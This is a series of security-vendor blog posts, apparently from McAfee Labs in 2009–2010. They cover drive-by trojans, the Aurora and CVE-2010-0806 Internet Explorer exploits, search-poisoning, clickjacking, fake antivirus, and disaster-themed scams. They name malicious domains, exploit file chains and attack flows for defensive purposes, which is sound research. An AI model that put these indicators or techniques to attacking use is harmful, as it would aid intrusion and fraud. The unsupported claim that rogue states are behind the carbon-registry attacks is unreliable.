As we were working through URLs identified as suspicious due to our GTI technology, one of the URLs that presented itself was an average “.com” site that loaded a php. As we processed this – it was interesting to see that this php actually reached out to download a file that ended with the string facebook.com.exe — as this “.com” site was very social-network friendly – it would be easy to see how an average user, without web protection in place, would not even realize what was going on.

And what was this *facebook.com.exe?  This was  detected it immediately by the McAfee Web Gateway Engine as: McAfee-GW-Edition 6.8.5 2010.03.10 Trojan.Injector.Awi.88

By the time I am writing this – it is already being seen with further visibility across our Artemis detection and we are making sure that all of our products protect against this threat.

This server where this was hosted has already been taken off-line – however, this threat, maneuver, and piece of malware will continue to be seen again, and again, and again. In fact, we already have other webservers that are hosting that same attack – along the same lines – and will be continuing to monitor and follow this particular attack.

McAfee Labs today published its March Spam Report.

This month authors Adam Wosotowsky and Elan Winkler discuss a possible charity scam in France that takes advantage of sympathy for the victims of the Haitian earthquake, examine a “ham campaign” regarding events in Haiti, and look at another fraudulent attempt to connect “lonely women” with victims’ credit cards.

Our key topics:

• Security professionals working together can expose fraudsters and sometimes bring about their arrests. One of our French researchers shows how it can work.
• The disaster in Haiti was as usual a spark for spammers, but it also caused a significant amount of legitimate “ham” email
• Spammers based primarily in China are keeping busy sending out scams offering Russian “brides” for sale

For this report and others, many available in up to eight languages besides English, visit our Threat Center Technical White Papers page.

Most of us are familiar with how high profile news events are used for malware distribution. We’ve seen it many times such as with Tiger Woods’ scandal and the earthquake in Haiti. Now the recent earthquake in Chile is used to prey upon unsuspecting folks interested in what’s going on with the post-quake and tsunami. This shows we should really be careful in our choices of where we go to get information. Try any related search term or phrase related to “Chile Earthquake”, “Tsunami”, etc. I’ve done so and will walk us through a few examples of risky to malicious content that my search turned up. This type of malware distribution tends to target the broadest audience possible, so I entered the search term “Chile” and then let Google auto-complete my search to “Chile quake 2010 tsunami” to load what is a popular search phrase. Almost immediately, among some recognizable news site results are random blog posts touting words like “download” or “.exe”. We should be suspicious of these.

The first few I tested were not surprising; standard looking blog posts with YouTube videos. But when I clicked on the YouTube videos, it appears YouTube had already found them to be violating YouTube terms. This was likely malicious content that had fortunately been discovered already. Here are a couple of examples, one with the video still embedded in the blog page, and the other directly from YouTube.

I found about 3 of these right off the bat. But then something more disturbing, and much more dangerous. Google’s Safebrowse warned the next site was already identified as malicious.

I didn’t continue further down that path, but continued to look at more of the search results. I next clicked to open what appeared to be a safe domain with terms about a princess apple, but what would a site such as this have to do with Chilean earthquakes? I was suspicious, and immediately knew why. Suddenly a pop-up message that we should all be familiar with or become aware opened without my action or approval. This is commonly referred to as Rogue AV, which is a malware disguised to look like an anti-malware security scan. These are very dangerous. Typically your best bet to get out of these is to go to your Windows Ctrl + Alt + Delete to call up the task manager and to kill your browser process. Otherwise the rogue AV will attempt to download the malicious payload. Don’t worry about clicking Cancel or trying to close your browser with the red X. Here’s a snapshot. Notice it attempts to look like a legitimate Windows Security alert, and reports your machine is infected with various Trojans and malware.

I clicked on one more blog, again looking like a fairly legit blog post with what I assumed may be a YouTube video, possibly pulled by YouTube like the previous examples, but what I found instead was my anti-virus software detected a hidden IFRAME to (modified for safety): ‘http://www.xxxxxx.xxxx/navbar.g?targetBlogID=78306394491143XXXXX&blogName=Auto+Loan+Insurance&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=LAYOUTS&searchRoot=http%3A%2F%2Fxxxxxxx.blogspot.com%2Fsearch&blogLocale=en&homepageUrl=http%3A%2F%2Fxxxxxxxxx.blogspot.com%2F’.

This should serve as a good reminder to be cautious when looking for information. Not only beware of where you are going to get information, consider some of the examples above and ask yourself, does this look like a legitimate site to get such information? Why would such a site turn up in search results for such a topic? Remember YouTube videos posted on blogs can easily be spoofed and may not be what you expect. For high profile news topics such as the recent earthquake in Chile, go to news sites you trust, rather than allowing a random search to take you to the information. In addition to developing wise surfing habits, McAfee has many tools to help, such as Site Advisor that will report how safe or risky a site may be, even before you click on them from your search results.

Earlier today, Microsoft released Security Advisory (981374). This advisory covers CVE-2010-0806, an unpatched vulnerability affecting Internet Explorer versions 6 and 7. This attack appears to be rather targeted at the moment, but as with other unpatched vulnerabilities in the past, this has the potential to explode now that the word is getting out.

McAfee Labs is aware of an attack emanating from the domain topix21century.com (over both http and https). In this attack, vulnerable users are directed to a malicious webpage that downloads and executes a file named notes.exe or svohost.exe (classified as BackDoor-EMN) in drive-by download fashion (visiting the page is enough to get infected). There are multiple variants of this trojan involved. Notes.exe creates two copies of itself in the %temp% directory, and drops a DLL file. This DLL file is injected into Internet Explorer and provides remote access to an attacker.

The backdoor allows an attacker to perform various functions on the compromised system, including uploading & downloading files, executing files, and terminating running processes. Infected systems may attempt to communicate with the domain notes.topix21century.com over https.

File names related to this attack include:

• 20100307.htm (CVE-2010-0806 exploit)
• bypasskav.txt (part of exploit obfuscation code)
  • notes.exe (backdoor installer)
    • note.exe (backdoor installer copy)
    • clipsvc.exe (backdoor installer copy)
      • wshipl.dll (backdoor)
    • rsvm.exe (backdoor installer)
      • wshipnotes.dll (backdoor)

Preliminary product coverage is as follows:

• McAfee DAT files (antivirus): Coverage will be provided for known exploits as Exploit-CVE-2010-0806 and known payloads as BackDoor-EMN in the 5916 DAT files, releasing March 10.
• McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover future exploits.
• McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover future exploits.
• McAfee Network Security Platform: The sigset releasing March 9 contains coverage under the signature “HTTP: Microsoft Internet Explorer Code Execution Vulnerability”.
• McAfee Vulnerability Manager: The FSL/MVM package of March 9 includes a vulnerability check to assess if your systems are at risk.
• McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts.
• McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts.
• McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

McAfee Labs is investigating this attack further and will continue to monitor any related activity closely.

Last week Apple formally announced the launch date for the Wi-Fi version of its much anticipated new tablet computer, the iPad. As with most events that generate a lot of media and consumer interest, this one also generated curiosity from the spammer community. They wonder how they can leverage this event to steal your sensitive information. 

Scams have already started to surface, claiming how you can win your own iPad for free. All you need to do is provide your address for shipment, and … Oh, yeah, to get your “free” iPad you also need to purchase something, which will require you to give us your credit card details. There had to be a catch somewhere.

Here is an example of such an email:

This scam is basically your typical “free offer” scam, but given the popularity and buzz surrounding any Apple product announcement, it’s essential to identify the legitimate from the “too good to be true.” As the release date for the iPad approaches, more scams such as this are likely to emerge, using email, social media technologies, and common search engine terms for delivery. 

Keep your eyes open, be diligent, and if you question whether any kind of offer you receive in email or on the web is legitimate, you should follow your instincts. Such offers are likely to be bogus.

We frequently read stories about spammers who can circumvent CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) authentication. Using bot-infected machines, they can create a vast number of random e-mail accounts for spamming purposes.

This week, a federal judge in Newark, New Jersey, revealed the latest use of a botnet-like network with a CAPTCHA breaker. In this case, the computers overseen by the defendants were used to buy seats for high-profile concerts and sports events from ticket sellers’ websites. The defendents later allegedly resold the tickets on Internet at much higher prices.

According to the indictment, the distributed software was developed by some programmer accomplices in Bulgaria. The application defeated security measures designed to limit individual ticket purchases and snatched up the best ones. Unlike botnets we frequently encounter, this one was set up on dedicated computers designed solely for this purpose. The botnet purchased more than 1.5 million premium tickets to events from late 2002 to about January 2009, making a profit estimated at $28.9 million.

The employees, contractors, and defendants behind this rip-off are known as the “Wiseguys,” based on the name of the Nevada corporation they created (Wiseguy Tickets, Inc.). The Wiseguys botnet was a nationwide network of computers used to purchase thousands of tickets within minutes. The botnet:

• Monitored the online ticket vendors’ websites for the exact moment that tickets to popular events went on sale
• Opened thousands of connections at the instant that tickets went on sale
• Defeated the CAPTCHA challenge in a fraction of a second (a human needs five to ten seconds), thus speeding ahead of legitimate buyers
• Supervised by Wiseguys employees, prepared lists of hundreds of the best tickets almost instantly
• Filled in all the fields necessary to complete the purchases, including customer credit card information and false e-mail addresses

The indictment explains how the Wiseguys took advantage of many popular events such as the BCS college football championship game, the Barbara Streisand concert in Chicago, Hannah Montana concerts in New Jersey, and the 2008 Bruce Springsteen Tour. For this last event, the botnet was able to purchase approximately 11,800 tickets.

One of their last crimes occurred in January 2009, according to the indictment, when the botnet impersonated 1,000 individual ticket buyers for the New York Giants vs. Philadelphia Eagles NFL playoff game at Giants Stadium in East Rutherford, New Jersey.

This affair is a perfect example of a targeted attack (here against the online ticket vendors) using malware that is not widespread. The affair demonstrates how important it is for administrators to keep watch over their networks and watch for even the slightest anomalies.

Check out this video for CNN’s coverage.

The combination of search engine optimization with sporting and holiday news continues to fascinate me. Oh, and did I mention malware and malicious websites? They always make for interesting bedfellows.

The Olympics have been getting massive coverage, of course, and St. Patrick’s Day is just around the corner. We can count on these events to provide cybercriminals with plenty of search engine manipulation possibilities and social engineering lures.

I ran a few basic Google searches and got pretty much what I expected: malicious sites and malware links. Starting with some basic Olympics-based searches, first for Olympic Games Wallpaper:

For this search three of the top five results lead to malicious links (not good). The next search moved onto Olympics-themed screensavers (which historically are heavily abused):

In this case two of the 10 results on the first page lead to malicious websites–actually less than I expected. But look what happened when I added the word download to my search:

In this case five of the 10 results on the first page were now malicious or questionable. Quite interesting. When I added an -s to download my results “improved” to six malicious entries!

Next I moved on to the theme of St. Patrick’s Day for wallpaper and screensavers. Lo and behold, just about the same types of results:

Just shy of half the results on the first page lead to some very nasty sites indeed for wallpaper. Next I also searched for themed screensavers:

Again, just about half the results on the first page lead to malicious links. That’s not surprising but certainly not good. Just remember this trend: news, sporting events, and holidays are common abuse targets for cybercriminals. Be suspicious when searching for info in any of these areas (and in many others). Safe-searching technologies such as SiteAdvisor are more important than ever.

Today’s cybercriminal is smart and prepared. Let’s all be smarter and better prepared.

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats are evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat reader.

A full copy of the Q4 2009 Threats Report is available here.

In recent weeks, various cybercrime attacks have disrupted the computer systems that allow nations to manage their national greenhouse-gas emissions quotas and their possession of carbon assets according to international agreements (the Kyoto Protocol and the European system). One quota is the right to emit the equivalent of one ton of carbon dioxide during a specified period.

The initial attack targeted the Danish CO₂ quota register that was shut down on January 12. The Danish authorities took this decision after registry users received a fake email purporting to originate from the Danish Energy Agency and redirecting the recipients to a mirror site to steal their credentials.

It seems the attackers renewed their attempt last week by sending similar emails to carbon financial services in 13 European countries. Here, too, the goal was the theft of usernames and passwords to gain access to the national CO₂ quotas management systems. This caused another quota-market closure.

Using these credentials, hackers–instead of manufacturers, governments, and brokers–would in theory be able to sell and buy quotas. During the past 18 months, fraud on the CO₂ market has caused a tax loss of €5 billion. Such access would also be useful for the biggest emitters of carbon dioxide; those countries could manipulate the international quotas to reduce their penalties. The following graphic, from Europol (the European Law Enforcement Agency), explains how such fraud can occur.

One thing is sure, the people behind these attacks cannot be simple hackers. They are likely in the pay of rogue states that reject rules-based international trade.

Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure used by the bad guys to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

• Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
• Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
• Don’t open attachments with donation forms, as they may be executable malware
• Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.

Microsoft has released Security Bulletin MS10-002, regarding Internet Explorer vulnerabilities. In addition to patching the flaw exposed by Operation Aurora, the company released patches for seven other vulnerabilities.

We are aware of reports of private CVE-2010-0249 exploits impacting Internet Explorer 7 and 8 (though these are mitigated with ASLR and DEP). Historically, the odds of private exploits being made public rise dramatically after a patch is released.

In my last post, I mentioned many detections were occurring on systems residing in China. The number of detections today in the United States are closing that gap.

This is not a patch to put on the back burner.

Here’s a quick update on CVE-2010-0249, aka the Aurora exploit.  A few days ago exploit code was made public.  Since then malware authors have been customizing the exploits payload to install their own malicious creations.  Much of the field telemetry we’ve been receiving has been coming from McAfee users in China visiting websites in China.  Some users have been directed to malicious sites from blog and forum posts, while other cases involve compromised web pages that use multiple javascripts and iframes to pull in the malicious content.

The exploits are often served from subdomains of 3322.org and 8866.org.  A common filename is ie.html, which references what.jpg, which contains part of the exploit code (and not a JPEG image).  Some payloads seen download files named down.css and log.css, which are malware executables.  Those executables contain functionality to download other malware, including:

• Artemis!629E2332CFDA – Generic PWS.y!bsk
• Artemis!78043EBA321B – PWS-Mmorpg!la
• Artemis!911BCF95C022 – PWS-OnlineGames.gx
• Generic Downloader.x!coe
• Generic Dropper!byp
• Generic PWS.y!bsk
• PWS-Mmorpg!la
• Suspect-02!50CB7D4BB04E – Generic Dropper.hi
• Suspect-26!4EBF601DCBF6 – PWS-Mmorpg!la
• Suspect-26!6D89EB2792F7 – PWS-Mmorpg!hb
• Suspect-26!B01B63F88994 – PWS-Mmorpg!la

Given that exploit code is readily available, this is likely the tip-of-the tip of the iceberg in terms of the domains and malware we are likely to see over the next few weeks (and we can expect to see new exploit and related malware variants for many months, if not years, to come).

Earlier today, Computer World reported that private exploits were created which exploit Internet Explorer 7 & 8, but that those exploits would remain private.  Still, this publicity may entice others to meet the challenge and go public to prove their prowess.

On the bright side, Microsoft said today that they would release an out of cycle patch for this vulnerability.  McAfee Labs advices those tempted to install an unofficial patch to think twice before doing so as malware and adware often arrive under the guise of such a “fix”.

On Saturday, my McAfee Labs colleague Craig Schmugar wrote about phishing sites and email scams related to the recent earthquake in Haiti. The people behind these frauds deserve to be caught by the law. I have a story that demonstrates that when several researchers join forces the bad guys run the risk of being punished.

On Sunday, among the hundreds of emails I received about Operation Aurora, I had one from Nick FitzGerald, a well-known anti-malware researcher. He asked for my opinion about a possible charity scam with a French origin.

Nick asked me to verify the details: an easy thing for a French speaker. After I tried calling the mobile phone number and got an answering machine, I contacted the town hall where the requester claimed to have his company. The official in charge did not know this company nor any local initiative in favor of the Haitian people.

Two Internet searches allowed me to identify a possible sender. First of all, I used the phone number and discovered–in the same administrative division–an individual selling a Mercedes.

As I suspected another rip-off (you pay an advance fee and you never see your car), I used the company name and discovered a professional diary with the name of the managing director: the same name as the car seller.

Finally, and just as I prepared my response to Nick, I received a call from some friends working at the French banking industry’s Computer Emergency Response Team. They had made the same discoveries, and they were also able to direct me to some court rulings related to this person. He was sentenced in 2009 after he used false insurance certificates and false bank guarantees.

Yesterday, I forwarded all these data to the authorities and hope that they will take appropriate steps. I cannot claim that this individual is once again breaking the law; in France we do enjoy the presumption of innocence. However, this story should prompt you to be vigilant and to not fall for email charity scams.

Last week the U.S. FBI released a warning on this subject.  Yesterday, they renewed the message with the following guidelines:

• Do not respond to any unsolicited (spam) incoming emails, including clicking links contained within those messages
• Be skeptical of individuals representing themselves as surviving victims or officials asking for donations via email or social networking sites
• Beware of organizations with copycat names similar to but not exactly the same as those of reputable charities
• Rather than following a purported link to a website, verify the legitimacy of nonprofit organizations by using various Internet-based resources to confirm the group’s existence and its nonprofit status
• Be cautious of emails that claim to show pictures of the disaster areas in attached files, because the files may contain viruses. Open attachments only from known senders.
• To ensure your money is received and used for its intended purposes, make contributions directly to known organizations rather than relying on others to make the donation on your behalf
• Do not be pressured into making contributions, as reputable charities do not use such tactics
• Do not give your personal or financial information to anyone who solicits contributions. Providing such information may compromise your identity and make you vulnerable to identity theft.
• Avoid cash donations if possible. Pay by debit or credit card, or write a check directly to the charity. Do not make checks payable to individuals.

I strongly agree with this advice!

We are pleased to announce the next event in our complimentary monthly “Hacking Exposed Live!–A Webcast Series,” which educates attendees to protect against cybercrime and hackers. The monthly webcast, hosted by Hacking Exposed coauthor and McAfee Senior Vice President Stuart McClure, walks attendees through the latest hacking techniques and explains countermeasures for preventing attacks.

The next webcast is January 21 at 11 a.m. Pacific time (2 p.m. Eastern) and will feature two white-hot security topics: Botnets and Aurora–the zero-day vulnerability that last week struck Google and several other well-known companies. McAfee Worldwide Chief Technology Officer George Kurtz and McAfee Senior Director Greg Brown will join McClure to enlighten the audience on how hackers exploit these vulnerabilities and what can be done to prevent them from impacting businesses.

Based on the best-selling security book Hacking Exposed, this live monthly webcast gives attendees deep insights into current and evolving hacks and what they can do to keep their environments protected. The webcasts include everything attendees need to know to stay ahead of those who would cause harm. The sessions will also address the universe of hacks–involving social media, mobile, Unix, and more.

Click here to learn more and register today.

In my last post I mentioned that the “Operation Aurora” exploit code was public and that we could expect other attacks leveraging the CVE-2010-0249 exploit to emerge.  Given the significance of the recent earthquake in Haiti, and the slew of phishing sites, email scams, etc; it makes sense that attackers would try to incorporate an unpatched Internet Explorer vulnerability and Haiti-related web content.

I figured a good place to look for attackers is by Googling the most popular search terms of the day.  It’s been a while since I last researched search engine manipulation.  As expected it was quite easy to find high ranking search results for Haiti-related terms; the vast majority led to rogue antivirus malicious sites, similar to earlier blogs.  I did not come across any sites exploiting the recent zero-day IE vulnerability.  However, I did come across plenty of Clickjacking, but not just Clickjacking, they have incorporated Google Trends, Digg.com, Blackhat SEO, and Clickfraud as well.

Here’s the apparent flow of the attack:

The attacker finds a hot search term using Google Trends or some other keyword tracking site (and perhaps anticipates term variations):

Next, they create the malicious web page (more below) and submit an entry to Digg.com using the same title, and a description that includes a bunch of relevant terms.  They also Digg the story (+1):

Seemingly the affiliation with Digg.com, the association of the title (taken from Google Trends), and description help boost the ranking in Google’s search results:

When a user following the link on Digg.com, they are taken to a generic website, enticing them to click on a “Play” icon.

What the user doesn’t see is the content that sits behind the image.  When a user clicks on the image, that click is passed along to an advertisement delivered through Google’s ad network (note the sites in the image below are potential victims here too as they could be charged for “unwanted clicks” on their ads).

This form of Clickfraud can generate money for the attacker.  If this fraud goes unnoticed, the advertiser would likely pay a referral fee to the attacker.

The web server shows many search terms seeded this way, including several related to Haiti:

• haiti-breaking-news
• haiti-earthquake-damage
• haiti-earthquake-info
• haiti-earthquake-relief
• haiti-earthquake-time
• haiti-pact-with-the-devil
• haiti-pat-robertson
• haiti-relief-effort
• haiti-support
• haitian-earthquake-relief
• haitian-relief-efforts
• hatia-earthquake-pictures

I should note that this isn’t so much a Haiti-targeted attack, but rather an attack targeted at any popular topic on the web right now.  In fact, they’re poisoning the term “internet security 2010 virus removal”, which exists because web users fell victim to rogue antivirus software, some undoubtedly due to the same type of search engine poisoning.

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is release; a slew of attackers are ready, willing, and able to capitalize.  What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.  This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’,  on the McAfee’s Security Insight blog  The purpose of this blog is to answer questions about this particular attack; fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded/navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer;  Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability.  Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How wide-spread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website, or opening an email attachment, etc).  Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7.  Microsoft lists the following combinations to be vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are affected.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

I received an interesting IM from a friend via BlackBerry Messenger [BBM] this weekend. She was worried that it could do damage to her shiny new BlackBerry and, as she knew I work for McAfee, she forwarded it to me for my opinion.

As soon as I read it, I knew it was a hoax and told her just to delete it.

It didn’t really surprise me that these Hoaxes are now being spread via BBM as the devices are becoming increasingly popular. I’m sure all of you have received the usual one via E-mail about a Virus which burns the whole hard disc C of your computer , well now I believe you will be seeing them on your BlackBerry.

I don’t want to take the usual route of blaming Social Networks sites but I believe they are the cause for this new wave of Hoaxes. The problem with Social Networks is that it enables almost anyone to be able to add you on several different IM’s by just visiting your page if you do not set your privacy settings correctly.

The new BBM also enables you to add new users by taking a picture of a barcode which is uniquely created for your BlackBerry pin. This makes it incredibly easy for people who you don’t know to add you to their contact list, which leaves you open to receiving more Hoaxes or Spam messages.

I have personally seen lots of these barcodes on several Social networks and forums and warn those who read this blog not to do the same and only share their PIN with contacts they trust.

Users should be careful who they accept as contacts, as you may start to see a lot more of these Hoaxes or even Spam in your BBM inbox.

With a dazzling laser show, the 26th Chaos Communication Congress (26c3) in Berlin, the last big security conference of 2009, has ended. If you haven’t been here, you might have missed fewer of the sessions than people on site, thanks to the worldwide availablility of live streams (and recordings). What you did miss was meeting all these people, though!

26c3 has simply outgrown the location it has occupied for the last few years, but this may be offset by a very successful experiment: allowing full remote access to the conference network via VPN for those who couldn’t attend. Other conferences should consider this (hey, Defcon team, are you reading this? ) as well, especially as air travel becomes less and less attractive.

During the last two days a number of the talks were on GSM security (Harald Welte, Dieter Spaar) and tracking phones (L. Aaron Kaplan). In case you missed Dan Kaminisky’s “Black Ops of PKI” earlier this year, we had another chance. Just before the closing ceremony, Frank Rieger and Ron repeated their session “Security Nightmares,” for the 10th time.

Security Nightmares was an entertaining, though a bit scary, summary of this year’s security issues and incidents, and a look at the future coupled with a wish list. Most notably, they’d like to see personal liability of executive management for the misuse of data. They call for a law for all companies to inform a customer or contact once a year about the personal data they have, what they did with it, and whom they shared it with or sold it to. The speakers repeatedly outlined the problem of data that people put online about themselves and their friends. Because pretty much all data leaks to the general public sooner or later, we need to take the utmost care when determining what to put online.

My personal rule: Don’t put anything online if you don’t want to see it on the front page of a newspaper.

I’ll finish with a quote from Security Nightmares (though I think it’s originally from Bruce Schneier): “Data is the pollution [problem] of the information age.” There’s something to think about when all the New Year’s Eve parties are over. Have a happy and secure 2010!

Cybercriminals love to use social engineering techniques to trick users into installing their malware. One of the latest fake-alert variants attempts to trick users into believing the software is related to or hosted by McAfee: mcafeevirusremover.com.

With DAT release 5835 (December 17) McAfee detects the HTML code for the domain as FakeAlert-KW!htm and the associated Trojan as FakeAlert-KW. The script hosted by the domain can attack the Windows browsers Internet Explorer, Mozilla Seamonkey, and Chrome. The script also affects browsers on Linux platforms.

This fake-alert variant is hosted on at least 13 other known domains. McAfee’s Trusted Source blocks the IP addresses and the domains (including DNS and mail servers) associated with this Trojan. For example:

The infection begins by redirecting the victim to the domain hosting the Trojan script code. This website is designed to look like Windows Explorer in Windows XP. It “reports” multiple infections on the victim’s computer:

If the user clicks anything within the browser, the FakeAlert-KW Trojan will download. Once it is installed, the Trojan offers a graphical interface designed to appear as a legitimate security application reporting multiple infections on the victim’s computer:

Infected machines will also suffer a barrage of pop-up balloons from the System Tray warning of various problems that require the user to register the software for a fee to “clean” the system:

Remember to update your McAfee products to ensure you are protected from these threats.

Day 2 and Night 2 of the 26th Chaos Communication Congress is over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (”data retention”). CCC-spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix ”FX” Lindner changed sides: In a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released a tool for sandboxing .swf files to prevent a class of Flash exploits called Blitzableiter (”lightning rod”). His tool is still work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you.

